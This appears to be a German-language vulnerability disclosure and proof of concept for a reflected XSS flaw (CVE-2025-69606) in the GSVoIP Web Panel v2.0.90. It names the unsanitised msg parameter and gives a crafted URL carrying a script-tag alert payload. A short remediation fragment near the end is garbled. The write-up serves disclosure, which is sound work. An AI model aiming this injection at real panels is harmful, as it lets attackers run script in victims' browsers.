
Proof-of-Concept für Reflektiertes XSS in CVE-2025-69606 des GSVoIP Web Panels v2.0.90. Zeigt eine nicht authentifizierte Remote-JavaScript-Ausführung über den nicht bereinigten `msg`-Parameter.
Schweregrad: Mittel | CWE: CWE-79 | Authentifizierung erforderlich: Nein | Vektor: Remote
Eine Reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke wurde im GSVoIP Web Panel (v2.0.90) identifiziert. Der Parameter msg des Error-Endpunkts bereinigt benutzergesteuerte Eingaben nicht, bevor er sie in der HTML-Antwort widerspiegelt, was die Ausführung beliebigen JavaScripts im Browser des Opfers ermöglicht.
| Feld | Details |
|---|---|
| Produkt | GSVoIP Web Panel |
| Version | 2.0.90 (wahrscheinlich frühere Versionen) |
| Hersteller | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| Angriffsvektor | Remote / Netzwerk |
| Authentifizierung | Nicht erforderlich |
GET /painel/gateways.php/error?msg=<payload>
Der Parameter msg wird direkt in der HTML-Antwort widergespiegelt, ohne Bereinigung oder Ausgabekodierung.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Dekodiert:
<script>alert(1)</script>
Wenn die manipulierte URL aufgerufen wird, wird die injizierte Nutzlast im Browser des Opfers ausgeführt:
alert(1)
msg enthält.script-src-Direktiven.| Schritt | Ereignis |
|---|---|
| 1 | Sicherheitslücke von Luiz Eduardo entdeckt und gemeldet |
| 2 | CVE zugewiesen: CVE-2025-69606 |
| 3 | Öffentliche Offenlegung |
Entdeckt und gemeldet von Luiz Eduardo
CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90